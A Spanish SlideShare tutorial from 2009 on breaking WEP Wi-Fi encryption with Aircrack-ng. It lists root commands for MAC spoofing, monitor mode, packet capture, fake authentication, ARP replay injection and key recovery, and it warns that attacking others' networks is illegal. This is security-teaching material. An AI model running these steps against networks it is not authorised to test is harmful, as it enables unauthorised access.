SlideShare a Scribd company logo
1 of 4
Aircrack-ng: Comandos básicos
Posted: marzo 11, 2009 in General, GNU/Linux, Manuales/How-To, Seguridad
Etiquetas: Aircrack, Aireplay, Airodump, ataque redes, crack WEP, GNU/Linux, WEP, wep vulnerable, WPA, WPA2-PSK
9




                                                  Aircrack-ng es una suite de programas para la auditoría
de redes inalámbricas.
¿Para qué es utilizado?. Sin duda ha logrado su éxito para realizar ataques a redes inalámbricas ajenas
con el objetivo de obtener la contraseña del router para poder acceder a internet entre otras cosas.
Esta acción es ILEGAL.
Es posible obtener las claves cifradas WEP y WPA/WPA2-PSK siendo las claves WEP las más fáciles
de descifrar y por error para el usuario de una conexión la más común.


Por ello es recomendable no usar encriptación WEP al ser
fácilmente vulnerable.
Todos los comandos e información está sacada de la web oficial de Aircrack-ng.org.
¿Qué necesito para usar Aircrack-ng?.
Es necesario tener una tarjeta de red inalámbrica compatible con airodump-ng (ver lista de
compatibilidad). Airodump-ng es el programa con el que se capturan los paquetes cifrados de la red
atacada para poder descifrar la clave.
Los programas en cuestión que trae Aircrack-ng así como macchanger.
¿Qué es recomendado tener para usar Aircrack-ng?
Es recomendable que nuestra tarjeta sea compatible con Aireplay-ng (ver lista de compatibilidad).
Aireplay-ng es el programa de inyección de paquetes. Éste programa generará más tráfico en la red y
por tanto capturaremos más paquetes en mucho menos tiempo.
Debido a que Aireplay-ng solo es compatible con el sistema operativo GNU/Linux, si queremos
poder inyectar paquetes es necesario que usemos alguna distribución GNU/Linux. Hay que mencionar
que hay distribuciones específicas que contienen ya Aircrack-ng así como más programas y
utilidades y driver parcheados para inyectar paquetes. Tales distribuciones son Live CD o Live USB,
ésto significa que no es necesario instalarlos en nuestra máquina, basta con grabarlos en un CD o USB
e iniciar la máquina arrancando desde ellos. Algunas de estas distribuciones son: Backtrack, WifiSlax,
WifiWay…
¿Cómo me instalo Aircrack-ng y Macchanger si no quiero usar Live CD o Live USB?
Si optas por instalar Aircrack-ng en tu Sistema Operativo puedes pasarte por su web de descargas.
Aircrack-ng Downloads
En Ubuntu, que es la distribución que uso yo:
     sudo apt-get install aircrack-ng

Para instalar Macchanger, puedes pasarte por su web
Macchanger Downloads
En Ubuntu:
     sudo apt-get install macchanger

Ya que tenemos todo preparado: Tarjeta compatible con airodump-ng y aireplay-ng y macchanger, os
voy a dejar unos comando básicos para hacer un ataque a una red con encriptacion WEP con
clientes asociados. Ten en cuenta que hacer este proceso a una red ajena a la propia es ILEGAL.
Prueba con tu red y verás que fácil es de vulnerar.
Todos los comandos e información está sacada de la web oficial de Aircrack-ng.org.
Primero abrimos una terminal (consola) y entramos como superusuario(root) para tener privilegios.
Este comando varía según la distribución GNU/Linux que usemos.
     sudo su

*** Preparación de la tarjeta
     airmon-ng

>>interfaz inalámbrico: nos devuelve por pantalla el nombre de la tarjeta red que tenemos (wifi0,
wlan0, ath0, ra0,…). Yo usaré ra0 por tener una ralink 2500.
     airmon-ng stop ra0

>>monitor mode disable: nos devuelve que nuestra tarjeta tiene el modo monitor desactivado.
     ifconfig ra0 down

>>tarjeta de red desactiva: no sale nada por pantalla.
     macchanger –mac 00:11:22:33:44:55 ra0

>>Current mac: xx:xx:xx:xx:xx:xx Fake mac:00:11:22:33:44:55: nos da la mac original y la falsa
que hemos nos hemos asignado para luego poder inyectar paquetes.
     airmon-ng start ra0
>>monitor mode enable: Ponemos nuestra tarjeta en modo monitor(necesario para poder capturar
paquetes)
*** Escaneo de redes y clientes asociados
     airodump-ng ra0

>>redes y clientes disponibles: nos sale una tabla con las redes disponibles con toda la información
como canal, nombre, calidad de señal, tipo de encriptación, etc.. y los clientes que están conectadas a
las redes. Así que elegimos una que tenga buena señal (que vaya capturando #data y tenga buen PWR)
apuntamos la BSSID, el numero de canal (CHANNEL). Paramos la ejecución del comando pulsando
“Control+C”, o cerrando y abriendo otra terminal.
     airodump-ng –c NumeroDeCanal –w ArchivoDeCapturas –bssid BBSID ra0

Por ejemplo una red en canal 11 con BSSID 00:01:02:03:04:C1 que hemos detectado: airodump-ng
-c 11 -w capturaswifi – - bssid 00:01:02:03:04:C1
>>Capturando paquetes…: nos va saliendo la captura de paquetes así como la señal de la red y los
clientes asociados. Dejamos recogiendo paquetes, por lo que ESTA TERMINAL NO LA
CIERRES!!!
*** Inyección de paquetes para agilizar el proceso de capturas de paquetes
Abre una nueva terminal (consola) con privilegios de superusuario(root) como antes.
     aireplay-ng -1 0 –a BSSID –h 00:11:22:33:44:55 –e ESSID ra0

>>Association successful: Con esto hacemos una autenticación falsa en el router. Para ello en el
comando se necesita la BSSID de la red atacada, la mac falsa que nos pusimos (00:11:22:33:44:55) y el
nombre que tiene la red atacada, es decir, la ESSID. Es importante que nos salga el Association
Succesful, de lo contrario no podremos inyectar paquetes. Por ejemplo: aireplay-ng 1 0 -a
00:01:02:03:04:05 -h 00:11:22:33:44:55 -e WIFI_RED ra0.
     aireplay-ng -3 –b BSID –h 00:11:22:33:44:55 ra0

>>Envío de paquetes…: nos saldrá por pantalla que se están mandando paquetes, para que la
inyección sea correcta deben aparecer paquetes ARP recogidos. Por ejemplo: aireplay-ng -3 -b
00:01:02:03:04:05 -h 00:11:22:33:44:55 ra0. Ahora dejamos que siga inyectando paquetes, por tanto
NO CIERRES ESTA TERMINAL!!!
*** Crackeo WEP
Para poder obtener la clave WEP es necesario tener un mínimo de paquetes recogidos. El número de
paquetes dependerá de la longitud que tenga la clave WEP. Como mínimo recomiendo que empecéis a
intentar conseguir la clave a partir de 25.000 por si la clave es de las cortas.
Cuando veamos en la terminal que dejamos el airodump-ng recogiendo paquetes que tenemos
más de 25.000 #data recogidos.
Abre una nueva terminal (consola) con privilegios de superusuario(root) como antes.
     aircrack-ng –b BSSID ArchivoDeCapturas.cap

>>Clave WEP encontrada/no encontrada: El programa empezará a descifrar los paquetes recogidos,
y cuando finalice nos dirá si ha encontrado la clave o no. Si no la encuentra nos recomienda que lo
volvamos a intentar superados “X” paquetes recogidos. Si la encuentra nos saldrá: KEY FOUND! y la
clave en hexadecimal normalmente.

More Related Content

What's hot

Troubleshooting Wireless LANs with Centralized Controllers
Troubleshooting Wireless LANs with Centralized ControllersTroubleshooting Wireless LANs with Centralized Controllers
Troubleshooting Wireless LANs with Centralized ControllersCisco Mobility
 
Cuadro comparativo
Cuadro comparativoCuadro comparativo
Cuadro comparativomlpv
 
TEST DE LA TARJETA MADRE
TEST DE LA TARJETA MADRE TEST DE LA TARJETA MADRE
TEST DE LA TARJETA MADRE Kelin Arango
 
Redes de área metropolitana y sus tecnologías
Redes de área metropolitana y sus tecnologías Redes de área metropolitana y sus tecnologías
Redes de área metropolitana y sus tecnologías Alberto Martínez
 
1.4 llamadassistemasoperativos
1.4 llamadassistemasoperativos1.4 llamadassistemasoperativos
1.4 llamadassistemasoperativosFernando Solis
 
DHCP Spoofing STP Mangling (CORP. ARMAS)
DHCP Spoofing STP Mangling (CORP. ARMAS)DHCP Spoofing STP Mangling (CORP. ARMAS)
DHCP Spoofing STP Mangling (CORP. ARMAS)Corp. Weapon's
 
Clases de subredes
Clases de subredesClases de subredes
Clases de subredestaniannz
 
Backup & Restore TFTP Cisco Packet Tracert
Backup & Restore TFTP Cisco Packet TracertBackup & Restore TFTP Cisco Packet Tracert
Backup & Restore TFTP Cisco Packet TracertIrmanda Dwi Prakoso
 
Los sistemas operativos de Red
Los sistemas operativos de Red Los sistemas operativos de Red
Los sistemas operativos de Red ANDINO2017
 
Cuestionario de Active Directory
Cuestionario de Active DirectoryCuestionario de Active Directory
Cuestionario de Active Directorycesartg65
 
Manual Instalación y Configuración Firewall TMG
Manual Instalación y Configuración Firewall TMGManual Instalación y Configuración Firewall TMG
Manual Instalación y Configuración Firewall TMGcyberleon95
 
Mantenimiento correctivo de software
Mantenimiento correctivo de softwareMantenimiento correctivo de software
Mantenimiento correctivo de softwarehedaro
 
How to configure dhcp on a cisco asa 5505
How to configure dhcp on a cisco asa 5505How to configure dhcp on a cisco asa 5505
How to configure dhcp on a cisco asa 5505IT Tech
 
Preguntas guía de cara al examen de REDES
Preguntas guía de cara al examen de REDESPreguntas guía de cara al examen de REDES
Preguntas guía de cara al examen de REDESINÉS ARABIA DíAZ
 

What's hot (20)

Troubleshooting Wireless LANs with Centralized Controllers
Troubleshooting Wireless LANs with Centralized ControllersTroubleshooting Wireless LANs with Centralized Controllers
Troubleshooting Wireless LANs with Centralized Controllers
 
Cuadro comparativo
Cuadro comparativoCuadro comparativo
Cuadro comparativo
 
Aplicaciones n capas en visual net
Aplicaciones n capas en visual netAplicaciones n capas en visual net
Aplicaciones n capas en visual net
 
TEST DE LA TARJETA MADRE
TEST DE LA TARJETA MADRE TEST DE LA TARJETA MADRE
TEST DE LA TARJETA MADRE
 
Redes de área metropolitana y sus tecnologías
Redes de área metropolitana y sus tecnologías Redes de área metropolitana y sus tecnologías
Redes de área metropolitana y sus tecnologías
 
Servidor DNS
Servidor DNSServidor DNS
Servidor DNS
 
1.4 llamadassistemasoperativos
1.4 llamadassistemasoperativos1.4 llamadassistemasoperativos
1.4 llamadassistemasoperativos
 
DHCP Spoofing STP Mangling (CORP. ARMAS)
DHCP Spoofing STP Mangling (CORP. ARMAS)DHCP Spoofing STP Mangling (CORP. ARMAS)
DHCP Spoofing STP Mangling (CORP. ARMAS)
 
Cortafuegos
CortafuegosCortafuegos
Cortafuegos
 
Clases de subredes
Clases de subredesClases de subredes
Clases de subredes
 
Backup & Restore TFTP Cisco Packet Tracert
Backup & Restore TFTP Cisco Packet TracertBackup & Restore TFTP Cisco Packet Tracert
Backup & Restore TFTP Cisco Packet Tracert
 
Introducción a los Sistemas Operativos
Introducción a los Sistemas OperativosIntroducción a los Sistemas Operativos
Introducción a los Sistemas Operativos
 
Los sistemas operativos de Red
Los sistemas operativos de Red Los sistemas operativos de Red
Los sistemas operativos de Red
 
Cuestionario de Active Directory
Cuestionario de Active DirectoryCuestionario de Active Directory
Cuestionario de Active Directory
 
Interrupciones de Hardware
Interrupciones de HardwareInterrupciones de Hardware
Interrupciones de Hardware
 
Manual Instalación y Configuración Firewall TMG
Manual Instalación y Configuración Firewall TMGManual Instalación y Configuración Firewall TMG
Manual Instalación y Configuración Firewall TMG
 
Ccnp3 lab 3_4_en
Ccnp3 lab 3_4_enCcnp3 lab 3_4_en
Ccnp3 lab 3_4_en
 
Mantenimiento correctivo de software
Mantenimiento correctivo de softwareMantenimiento correctivo de software
Mantenimiento correctivo de software
 
How to configure dhcp on a cisco asa 5505
How to configure dhcp on a cisco asa 5505How to configure dhcp on a cisco asa 5505
How to configure dhcp on a cisco asa 5505
 
Preguntas guía de cara al examen de REDES
Preguntas guía de cara al examen de REDESPreguntas guía de cara al examen de REDES
Preguntas guía de cara al examen de REDES
 

Similar to Aircrack ng: comandos básicos

Similar to Aircrack ng: comandos básicos (20)

Crack redes wifi
Crack redes wifiCrack redes wifi
Crack redes wifi
 
Funcionamiento básico y primeros pasos en wifislax
Funcionamiento básico y primeros pasos en wifislaxFuncionamiento básico y primeros pasos en wifislax
Funcionamiento básico y primeros pasos en wifislax
 
Qué es wep
Qué es wepQué es wep
Qué es wep
 
Backtrack 3 manual
Backtrack 3 manualBacktrack 3 manual
Backtrack 3 manual
 
Cracking wep con kali linux
Cracking wep con kali linuxCracking wep con kali linux
Cracking wep con kali linux
 
Auditoria En Wireless
Auditoria En WirelessAuditoria En Wireless
Auditoria En Wireless
 
Backtrack 3
Backtrack 3Backtrack 3
Backtrack 3
 
Testing Redes Inalambricas wifiway (Definiciones))
Testing Redes Inalambricas wifiway (Definiciones))Testing Redes Inalambricas wifiway (Definiciones))
Testing Redes Inalambricas wifiway (Definiciones))
 
Wep wpa wpa2-cracking
Wep wpa wpa2-crackingWep wpa wpa2-cracking
Wep wpa wpa2-cracking
 
Wep wpa wpa2-cracking
Wep wpa wpa2-crackingWep wpa wpa2-cracking
Wep wpa wpa2-cracking
 
Backtrack 5
Backtrack 5Backtrack 5
Backtrack 5
 
Backtrack 5
Backtrack 5Backtrack 5
Backtrack 5
 
Flisol Airacrack-ng
Flisol Airacrack-ng Flisol Airacrack-ng
Flisol Airacrack-ng
 
Workshop Seguridad Wireless
Workshop Seguridad WirelessWorkshop Seguridad Wireless
Workshop Seguridad Wireless
 
Como usar Aircrack
Como usar AircrackComo usar Aircrack
Como usar Aircrack
 
Airodump
AirodumpAirodump
Airodump
 
Bactrack4
Bactrack4Bactrack4
Bactrack4
 
Bactrack4
Bactrack4Bactrack4
Bactrack4
 
Crackeando redes wep
Crackeando redes wepCrackeando redes wep
Crackeando redes wep
 
Seguridad: Backtrack2
Seguridad: Backtrack2 Seguridad: Backtrack2
Seguridad: Backtrack2
 

Aircrack ng: comandos básicos

  • 1. Aircrack-ng: Comandos básicos Posted: marzo 11, 2009 in General, GNU/Linux, Manuales/How-To, Seguridad Etiquetas: Aircrack, Aireplay, Airodump, ataque redes, crack WEP, GNU/Linux, WEP, wep vulnerable, WPA, WPA2-PSK 9 Aircrack-ng es una suite de programas para la auditoría de redes inalámbricas. ¿Para qué es utilizado?. Sin duda ha logrado su éxito para realizar ataques a redes inalámbricas ajenas con el objetivo de obtener la contraseña del router para poder acceder a internet entre otras cosas. Esta acción es ILEGAL. Es posible obtener las claves cifradas WEP y WPA/WPA2-PSK siendo las claves WEP las más fáciles de descifrar y por error para el usuario de una conexión la más común. Por ello es recomendable no usar encriptación WEP al ser fácilmente vulnerable. Todos los comandos e información está sacada de la web oficial de Aircrack-ng.org. ¿Qué necesito para usar Aircrack-ng?. Es necesario tener una tarjeta de red inalámbrica compatible con airodump-ng (ver lista de compatibilidad). Airodump-ng es el programa con el que se capturan los paquetes cifrados de la red atacada para poder descifrar la clave. Los programas en cuestión que trae Aircrack-ng así como macchanger. ¿Qué es recomendado tener para usar Aircrack-ng? Es recomendable que nuestra tarjeta sea compatible con Aireplay-ng (ver lista de compatibilidad). Aireplay-ng es el programa de inyección de paquetes. Éste programa generará más tráfico en la red y por tanto capturaremos más paquetes en mucho menos tiempo. Debido a que Aireplay-ng solo es compatible con el sistema operativo GNU/Linux, si queremos poder inyectar paquetes es necesario que usemos alguna distribución GNU/Linux. Hay que mencionar
  • 2. que hay distribuciones específicas que contienen ya Aircrack-ng así como más programas y utilidades y driver parcheados para inyectar paquetes. Tales distribuciones son Live CD o Live USB, ésto significa que no es necesario instalarlos en nuestra máquina, basta con grabarlos en un CD o USB e iniciar la máquina arrancando desde ellos. Algunas de estas distribuciones son: Backtrack, WifiSlax, WifiWay… ¿Cómo me instalo Aircrack-ng y Macchanger si no quiero usar Live CD o Live USB? Si optas por instalar Aircrack-ng en tu Sistema Operativo puedes pasarte por su web de descargas. Aircrack-ng Downloads En Ubuntu, que es la distribución que uso yo: sudo apt-get install aircrack-ng Para instalar Macchanger, puedes pasarte por su web Macchanger Downloads En Ubuntu: sudo apt-get install macchanger Ya que tenemos todo preparado: Tarjeta compatible con airodump-ng y aireplay-ng y macchanger, os voy a dejar unos comando básicos para hacer un ataque a una red con encriptacion WEP con clientes asociados. Ten en cuenta que hacer este proceso a una red ajena a la propia es ILEGAL. Prueba con tu red y verás que fácil es de vulnerar. Todos los comandos e información está sacada de la web oficial de Aircrack-ng.org. Primero abrimos una terminal (consola) y entramos como superusuario(root) para tener privilegios. Este comando varía según la distribución GNU/Linux que usemos. sudo su *** Preparación de la tarjeta airmon-ng >>interfaz inalámbrico: nos devuelve por pantalla el nombre de la tarjeta red que tenemos (wifi0, wlan0, ath0, ra0,…). Yo usaré ra0 por tener una ralink 2500. airmon-ng stop ra0 >>monitor mode disable: nos devuelve que nuestra tarjeta tiene el modo monitor desactivado. ifconfig ra0 down >>tarjeta de red desactiva: no sale nada por pantalla. macchanger –mac 00:11:22:33:44:55 ra0 >>Current mac: xx:xx:xx:xx:xx:xx Fake mac:00:11:22:33:44:55: nos da la mac original y la falsa que hemos nos hemos asignado para luego poder inyectar paquetes. airmon-ng start ra0
  • 3. >>monitor mode enable: Ponemos nuestra tarjeta en modo monitor(necesario para poder capturar paquetes) *** Escaneo de redes y clientes asociados airodump-ng ra0 >>redes y clientes disponibles: nos sale una tabla con las redes disponibles con toda la información como canal, nombre, calidad de señal, tipo de encriptación, etc.. y los clientes que están conectadas a las redes. Así que elegimos una que tenga buena señal (que vaya capturando #data y tenga buen PWR) apuntamos la BSSID, el numero de canal (CHANNEL). Paramos la ejecución del comando pulsando “Control+C”, o cerrando y abriendo otra terminal. airodump-ng –c NumeroDeCanal –w ArchivoDeCapturas –bssid BBSID ra0 Por ejemplo una red en canal 11 con BSSID 00:01:02:03:04:C1 que hemos detectado: airodump-ng -c 11 -w capturaswifi – - bssid 00:01:02:03:04:C1 >>Capturando paquetes…: nos va saliendo la captura de paquetes así como la señal de la red y los clientes asociados. Dejamos recogiendo paquetes, por lo que ESTA TERMINAL NO LA CIERRES!!! *** Inyección de paquetes para agilizar el proceso de capturas de paquetes Abre una nueva terminal (consola) con privilegios de superusuario(root) como antes. aireplay-ng -1 0 –a BSSID –h 00:11:22:33:44:55 –e ESSID ra0 >>Association successful: Con esto hacemos una autenticación falsa en el router. Para ello en el comando se necesita la BSSID de la red atacada, la mac falsa que nos pusimos (00:11:22:33:44:55) y el nombre que tiene la red atacada, es decir, la ESSID. Es importante que nos salga el Association Succesful, de lo contrario no podremos inyectar paquetes. Por ejemplo: aireplay-ng 1 0 -a 00:01:02:03:04:05 -h 00:11:22:33:44:55 -e WIFI_RED ra0. aireplay-ng -3 –b BSID –h 00:11:22:33:44:55 ra0 >>Envío de paquetes…: nos saldrá por pantalla que se están mandando paquetes, para que la inyección sea correcta deben aparecer paquetes ARP recogidos. Por ejemplo: aireplay-ng -3 -b 00:01:02:03:04:05 -h 00:11:22:33:44:55 ra0. Ahora dejamos que siga inyectando paquetes, por tanto NO CIERRES ESTA TERMINAL!!! *** Crackeo WEP Para poder obtener la clave WEP es necesario tener un mínimo de paquetes recogidos. El número de paquetes dependerá de la longitud que tenga la clave WEP. Como mínimo recomiendo que empecéis a intentar conseguir la clave a partir de 25.000 por si la clave es de las cortas. Cuando veamos en la terminal que dejamos el airodump-ng recogiendo paquetes que tenemos más de 25.000 #data recogidos. Abre una nueva terminal (consola) con privilegios de superusuario(root) como antes. aircrack-ng –b BSSID ArchivoDeCapturas.cap >>Clave WEP encontrada/no encontrada: El programa empezará a descifrar los paquetes recogidos, y cuando finalice nos dirá si ha encontrado la clave o no. Si no la encuentra nos recomienda que lo
  • 4. volvamos a intentar superados “X” paquetes recogidos. Si la encuentra nos saldrá: KEY FOUND! y la clave en hexadecimal normalmente.